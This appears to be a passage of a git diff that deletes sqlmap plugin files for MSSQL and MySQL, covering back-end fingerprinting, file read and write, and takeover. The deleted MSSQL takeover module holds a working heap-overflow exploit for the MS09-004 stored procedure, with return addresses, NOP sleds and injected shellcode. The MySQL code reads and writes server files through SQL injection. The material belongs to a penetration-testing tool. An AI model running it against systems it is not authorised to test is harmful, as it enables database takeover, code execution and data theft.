\ - ("2005", "XACT_STATE()=XACT_STATE()"), \ - ("2008", "SYSDATETIME()=SYSDATETIME()"), \ - ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")): - result = inject.checkBooleanExpression(check) - - if result: - Backend.setVersion(version) - - if Backend.getVersion(): - setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) - else: - setDbms(DBMS.MSSQL) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL - 
logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack(): - return - - if not Backend.getOs(): - Backend.setOs(OS.WINDOWS) - - if not detailed: - return - - infoMsg = "fingerprinting the back-end DBMS operating system " - infoMsg += "version and service pack" - logger.info(infoMsg) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") - inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - - # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions - # http://en.wikipedia.org/wiki/Windows_NT#Releases - versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), - "2000": ("5.0", (4, 3, 2, 1)), - "XP": ("5.1", (3, 2, 1)), - "2003": ("5.2", (2, 1)), - "Vista or 2008": ("6.0", (2, 1)), - "7 or 2008 R2": ("6.1", (1, 0)), - "8 or 2012": ("6.2", (0,)), - "8.1 or 2012 R2": ("6.3", (0,)) } - - # Get back-end DBMS underlying operating system version - for version, data in versions.items(): - query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Windows NT " + data[0] + "%')" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsVersion(version) - infoMsg += " %s" % Backend.getOsVersion() - break - - if not Backend.getOsVersion(): - Backend.setOsVersion("2003") - Backend.setOsServicePack(2) - - warnMsg = "unable to fingerprint the underlying operating " - warnMsg += "system version, assuming it is Windows " - warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack()) - logger.warn(warnMsg) - - self.cleanup(onlyFileTbl=True) - - return - - # Get back-end DBMS underlying operating system service pack - sps = versions[Backend.getOsVersion()][1] - for sp in sps: - query = "EXISTS(SELECT %s FROM %s WHERE %s " % 
(self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsServicePack(sp) - break - - if not Backend.getOsServicePack(): - debugMsg = "assuming the operating system has no service pack" - logger.debug(debugMsg) - - Backend.setOsServicePack(0) - - if Backend.getOsVersion(): - infoMsg += " Service Pack %d" % Backend.getOsServicePack() - - logger.info(infoMsg) - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py deleted file mode 100644 index bfb02676..00000000 --- a/plugins/dbms/mssqlserver/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar' - """ - - def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "NCHAR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py deleted file mode 100644 index 3d9ff14e..00000000 --- a/plugins/dbms/mssqlserver/takeover.py +++ /dev/null @@ -1,143 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.common import Backend -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject 
-from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.spExploit = "" - - GenericTakeover.__init__(self) - - def uncPathRequest(self): - #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) - inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) - - def spHeapOverflow(self): - """ - References: - * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx - * http://support.microsoft.com/kb/959420 - """ - - returns = { - # 2003 Service Pack 0 - "2003-0": (""), - - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), - - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), - - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), - - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", 
"CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } - addrs = None - - for versionSp, data in returns.items(): - version, sp = versionSp.split("-") - sp = int(sp) - - if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp: - addrs = data - - break - - if not addrs: - errMsg = "sqlmap can not exploit the stored procedure buffer " - errMsg += "overflow because it does not have a valid return " - errMsg += "code for the underlying operating system (Windows " - errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack()) - raise SqlmapUnsupportedFeatureException(errMsg) - - shellcodeChar = "" - hexStr = binascii.hexlify(self.shellcodeString[:-1]) - - for hexPair in xrange(0, len(hexStr), 2): - shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] - - shellcodeChar = shellcodeChar[:-1] - - self.spExploit = """DECLARE @buf NVARCHAR(4000), - @val NVARCHAR(4), - @counter INT - SET @buf = ' - DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int - EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' - SET @val = CHAR(0x41) - SET @counter = 0 - WHILE @counter < 3320 - BEGIN - SET @counter = @counter + 1 - IF @counter = 411 - BEGIN - /* pointer to call [ecx+8] */ - SET @buf = @buf + %s - - /* push ebp, pop esp, ret 4 */ - SET @buf = @buf + %s - - /* push ecx, pop esp, pop ebp, retn 8 */ - SET @buf = @buf + %s - - /* Garbage */ - SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51) - - /* retn 1c */ - SET @buf = @buf + %s - - /* retn 1c */ - SET @buf = @buf + %s - - /* anti DEP */ - SET @buf = @buf + %s - - /* jmp esp */ - SET @buf = @buf + %s - - /* jmp esp */ - 
SET @buf = @buf + %s - - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - - set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00) - set @buf = @buf + CHAR(0x8B)+CHAR(0xEC) - set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20) - - /* Metasploit shellcode */ - SET @buf = @buf + %s - - SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3) - SET @counter = @counter + 302 - SET @val = CHAR(0x43) - CONTINUE - END - SET @buf = @buf + @val - END - SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' - EXEC master..sp_executesql @buf - """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar) - - self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ") - - logger.info("triggering the buffer overflow vulnerability, please wait..") - inject.goStacked(self.spExploit, silent=True) diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py deleted file mode 100644 index bd0d9e20..00000000 --- a/plugins/dbms/mysql/__init__.py +++ /dev/null @@ -1,39 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import MYSQL_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.mysql.enumeration import Enumeration -from plugins.dbms.mysql.filesystem import Filesystem -from plugins.dbms.mysql.fingerprint import Fingerprint -from plugins.dbms.mysql.syntax import Syntax -from plugins.dbms.mysql.takeover import Takeover -from plugins.generic.misc 
import Miscellaneous - -class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines MySQL methods - """ - - def __init__(self): - self.excludeDbsList = MYSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.MYSQL] = Syntax.escape diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py deleted file mode 100644 index fd8406b3..00000000 --- a/plugins/dbms/mysql/connector.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import pymysql -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://code.google.com/p/pymysql/ - User guide: http://code.google.com/p/pymysql/ - API: http://code.google.com/p/pymysql/ - Debian package: - License: MIT - - Possible connectors: http://wiki.python.org/moin/MySQL - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - 
except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py deleted file mode 100644 index 60e7cd14..00000000 --- a/plugins/dbms/mysql/enumeration.py +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py deleted file mode 100644 index 344c467e..00000000 --- a/plugins/dbms/mysql/filesystem.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomStr -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import 
PAYLOAD -from lib.core.enums import PLACE -from lib.core.exception import SqlmapNoneDataException -from lib.request import inject -from lib.techniques.union.use import unionUse -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def nonStackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) - - return result - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "longtext") - self.getRemoteTempPath() - - tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) - - debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile - debugMsg += "into temporary file '%s'" % tmpFile - logger.debug(debugMsg) - inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) - - debugMsg = "loading the content of hexadecimal encoded file " - debugMsg += "'%s' into support table" % rFile - logger.debug(debugMsg) - inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) - - length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(length): - warnMsg = "unable to retrieve the content of the " - warnMsg += "file '%s'" % rFile - - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - warnMsg += ", going to fall-back to simpler UNION technique" - logger.warn(warnMsg) - result = self.nonStackedReadFile(rFile) - else: - raise SqlmapNoneDataException(warnMsg) - else: - length = int(length) - sustrLen = 1024 - - if length > sustrLen: - result = [] - - 
for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - - result.append(chunk) - else: - result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - - return result - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - logger.debug("encoding file to its hexadecimal string value") - - fcEncodedList = self.fileEncode(wFile, "hex", True) - fcEncodedStr = fcEncodedList[0] - fcEncodedStrLen = len(fcEncodedStr) - - if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " - warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen - warnMsg += "bytes, this might cause errors in the file " - warnMsg += "writing process" - logger.warn(warnMsg) - - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) - logger.debug(debugMsg) - - pushValue(kb.forceWhere) - kb.forceWhere = PAYLOAD.WHERE.NEGATIVE - sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) - unionUse(sqlQuery, unpack=False) - kb.forceWhere = popValue() - - warnMsg = "expect junk characters inside the " - warnMsg += "file as a leftover from UNION query" - singleTimeWarnMessage(warnMsg) - - return self.askCheckWrittenFile(wFile, dFile, forceCheck) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - debugMsg = "creating a support table to write the hexadecimal " - debugMsg += "encoded file to" - logger.debug(debugMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "longblob") - - logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", False) - - debugMsg = "forging SQL statements to write the hexadecimal " - debugMsg += "encoded file to the support table" - 
logger.debug(debugMsg) - - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - logger.debug("inserting the hexadecimal encoded file to the support table") - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) - logger.debug(debugMsg) - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html - inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) - - return self.askCheckWrittenFile(wFile, dFile, forceCheck) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py deleted file mode 100644 index 5cd9a5c4..00000000 --- a/plugins/dbms/mysql/fingerprint.py +++ /dev/null @@ -1,286 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.MYSQL) - - def _commentCheck(self): - infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/* NoValue */") - - if not result: - warnMsg = "unable to perform %s comment injection" % DBMS.MYSQL - logger.warn(warnMsg) - - return None - - # MySQL valid versions updated on 04/2011 - versions = ( - (32200, 32235), # MySQL 3.22 - (32300, 32359), 
# MySQL 3.23 - (40000, 40032), # MySQL 4.0 - (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 - (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 - (60000, 60014), # MySQL 6.0 - ) - - index = -1 - for i in xrange(len(versions)): - element = versions[i] - version = element[0] - version = getUnicode(version) - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) - - if result: - break - else: - index += 1 - - if index >= 0: - prevVer = None - - for version in xrange(versions[index][0], versions[index][1] + 1): - version = getUnicode(version) - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) - - if result: - if not prevVer: - prevVer = version - - if version[0] == "3": - midVer = prevVer[1:3] - else: - midVer = prevVer[2] - - trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:]) - - return trueVer - - prevVer = version - - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp and not hasattr(conf, "api"): - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp and not hasattr(conf, "api"): - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - comVer = self._commentCheck() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if comVer: - comVer = Format.getDbms([comVer]) - value += "\n%scomment injection fingerprint: %s" % (blank, comVer) - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None - - if banVer and re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, 
banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89) - * http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42) - * http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4) - * http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0) - * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) - - if Backend.isVersionGreaterOrEqualThan("5"): - kb.data.has_information_schema = True - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL") - - if result: - infoMsg = "confirming %s" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - - # reading information_schema on some platforms is causing annoying timeout exits - # Reference: http://bugs.mysql.com/bug.php?id=15855 - - # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): - kb.data.has_information_schema = True - Backend.setVersion(">= 5.0.0") - setDbms("%s 5" % DBMS.MYSQL) - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % 
DBMS.MYSQL - logger.info(infoMsg) - - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") - - # Check if it is MySQL >= 5.1.2 and < 5.5.0 - elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): - if inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.12", "< 5.5.0"]) - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.7", "< 5.1.12"]) - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"): - Backend.setVersion("= 5.1.6") - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.5", "< 5.1.6"]) - else: - Backend.setVersionList([">= 5.1.2", "< 5.1.5"]) - - # Check if it is MySQL >= 5.0.0 and < 5.1.2 - elif inject.checkBooleanExpression("@@hostname=@@hostname"): - Backend.setVersionList([">= 5.0.38", "< 5.1.2"]) - elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"): - Backend.setVersionList([">= 5.0.19", "< 5.0.38"]) - elif not inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"): - Backend.setVersionList([">= 5.0.11", "< 5.0.19"]) - elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"): - Backend.setVersionList([">= 5.0.6", "< 5.0.11"]) - elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"): - Backend.setVersionList([">= 5.0.3", "< 5.0.6"]) - else: - Backend.setVersionList([">= 5.0.0", "< 5.0.3"]) - - elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): - Backend.setVersion(">= 5.0.2") - setDbms("%s 5" % DBMS.MYSQL) - self.getBanner() - - elif 
inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"): - Backend.setVersion("< 5.0.0") - setDbms("%s 4" % DBMS.MYSQL) - self.getBanner() - - if not conf.extensiveFp: - return True - - # Check which version of MySQL < 5.0.0 it is - if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"): - Backend.setVersionList([">= 4.1.11", "< 5.0.0"]) - elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"): - Backend.setVersionList([">= 4.1.1", "< 4.1.11"]) - elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"): - Backend.setVersionList([">= 4.0.6", "< 4.1.1"]) - - if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"): - Backend.setVersion("= 4.1.0") - else: - Backend.setVersionList([">= 4.0.6", "< 4.1.0"]) - else: - Backend.setVersionList([">= 4.0.0", "< 4.0.6"]) - else: - Backend.setVersion("< 4.0.0") - setDbms("%s 3" % DBMS.MYSQL) - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system" - logger.info(infoMsg) - - result = inject.checkBooleanExpression("'W'=UPPER(MID(@@version_compile_os,1,1))") - - if result: - Backend.setOs(OS.WINDOWS) - elif not result: - Backend.setOs(OS.LINUX) - - if Backend.getOs(): - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - logger.info(infoMsg) - else: - self.userChooseDbmsOs() - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py deleted file mode 100644 index 77c3a73e..00000000 --- a/plugins/dbms/mysql/syntax.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.convert import utf8encode 
